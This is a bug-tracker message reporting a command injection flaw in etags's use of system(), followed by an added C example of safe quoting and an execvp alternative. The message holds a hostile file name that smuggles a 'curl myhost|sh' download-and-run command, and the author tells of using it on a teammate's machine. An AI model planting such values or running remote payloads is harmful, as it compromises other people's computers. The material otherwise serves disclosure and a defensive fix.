bug#59817: [PATCH] Fix etags local command injection vulnerability
From: lux
Subject: bug#59817: [PATCH] Fix etags local command injection vulnerability
Date: Mon, 5 Dec 2022 08:58:13 +0800
> Please understand: etags is a stable program. I'm not interested in
> changes that modify its design or implementation in such drastic ways.
I understand, but I don't completely agree: stable != security.
Why use the system() function? This is a lazy, insecure little trick; the exec* functions (such as execvp) should be used instead. We need to execute a command, but we don't need to execute a shell script.
An example case: in my team, some people like to automatically pull new code from the code server and use etags to update the tags, so I secretly uploaded a new file whose name is:
$ touch "';curl myhost|sh #'a.z"
When he automatically updates the tags, I hack his computer.
So, I have two suggestions:
1. Don't use system() unless you know what you are doing.
2. Escape all dangerous characters; just escaping quotes is not enough. The following can perform additional actions:
"$(ls)" "`ls`" "${SHELL}" "$SHELL"
I'm writing a new patch to escape dangerous characters, and will test it.
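The two approaches contrasted in the message, shown side by side as an added example; this is not code from the etags patch or the Emacs sources, and the function names and the constructed sample file name (the one from the report) are this example's own. The shell path runs the command through `sh -c` exactly as system() would, but only after wrapping the file name in single quotes with the standard `'\''` treatment, which leaves `$(...)`, backticks and `${SHELL}` inert; the execvp path passes the name as one argv element so no shell parses it at all.

```c
/* Added example, not from the etags patch or the Emacs sources: the two
   approaches the message contrasts. Sample input is the constructed hostile
   file name from the report. Function names are this example's own. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

static const char HOSTILE[] = "';curl myhost|sh #'a.z";

/* Characters sh treats specially outside single quotes. Escaping only
   the quote characters leaves $ ` ( ) | ; and the rest active. */
static const char SHELL_META[] = "|&;<>()$`\\\"' \t\n*?[]#~";

int needs_quoting(const char *s)
{
    return strpbrk(s, SHELL_META) != NULL;
}

/* If a shell really is unavoidable: wrap the whole argument in single
   quotes. Inside them sh interprets nothing, so the only byte that needs
   handling is ' itself, which becomes '\'' (close quote, escaped quote,
   reopen). Returns the length written, or -1 if out is too small. */
int shell_single_quote(const char *s, char *out, size_t n)
{
    size_t k = 0;
    if (n < 3) return -1;
    out[k++] = '\'';
    for (; *s; s++) {
        size_t len = (*s == '\'') ? 4 : 1;
        if (k + len + 2 > n) return -1;   /* room for this + closing ' + NUL */
        if (len == 4) memcpy(out + k, "'\\''", 4);
        else out[k] = *s;
        k += len;
    }
    out[k++] = '\'';
    out[k] = '\0';
    return (int)k;
}

/* The better fix: no shell at all. argv[0] is looked up on PATH and each
   element reaches the child untouched. stdout is captured into out so the
   result can be compared. Returns the child's exit status, or -1 on error. */
int run_capture(char *const argv[], char *out, size_t n)
{
    int fds[2];
    if (pipe(fds) == -1) return -1;
    pid_t pid = fork();
    if (pid == -1) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);
    }
    close(fds[1]);
    size_t got = 0;
    ssize_t r;
    while (got + 1 < n && (r = read(fds[0], out + got, n - 1 - got)) > 0)
        got += (size_t)r;
    out[got] = '\0';
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) == -1) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* system()-style: the command line goes through "sh -c", so the file name
   is parsed as shell syntax unless it is quoted first. */
int echo_via_shell(const char *name, char *out, size_t n)
{
    char quoted[256], cmd[300];
    if (shell_single_quote(name, quoted, sizeof quoted) < 0) return -1;
    snprintf(cmd, sizeof cmd, "printf %%s %s", quoted);
    char *argv[] = { "sh", "-c", cmd, NULL };
    return run_capture(argv, out, n);
}

/* execvp-style: the name is one argv element; there is nothing to quote
   because no shell ever sees it. */
int echo_via_argv(const char *name, char *out, size_t n)
{
    char *argv[] = { "printf", "%s", (char *)name, NULL };
    return run_capture(argv, out, n);
}

/* Result checks: does the quoted form match, and does the name come back
   byte-for-byte from each path (i.e. nothing in it was executed)? */
int quotes_to(const char *s, const char *expected)
{
    char buf[256];
    return shell_single_quote(s, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}

int roundtrips(const char *name, int via_shell)
{
    char out[256];
    int rc = via_shell ? echo_via_shell(name, out, sizeof out)
                       : echo_via_argv(name, out, sizeof out);
    return rc == 0 && strcmp(out, name) == 0;
}

int main(void)
{
    printf("needs quoting: %d\n", needs_quoting(HOSTILE));
    printf("sh -c path intact: %d\n", roundtrips(HOSTILE, 1));
    printf("execvp path intact: %d\n", roundtrips(HOSTILE, 0));
    return 0;
}
```

Without the single quotes, the same `sh -c` command line would end the quoted string at the first `'` and run `curl myhost|sh` as a separate command; with `execvp` the question never arises, which is why the message prefers it over patching the escaping.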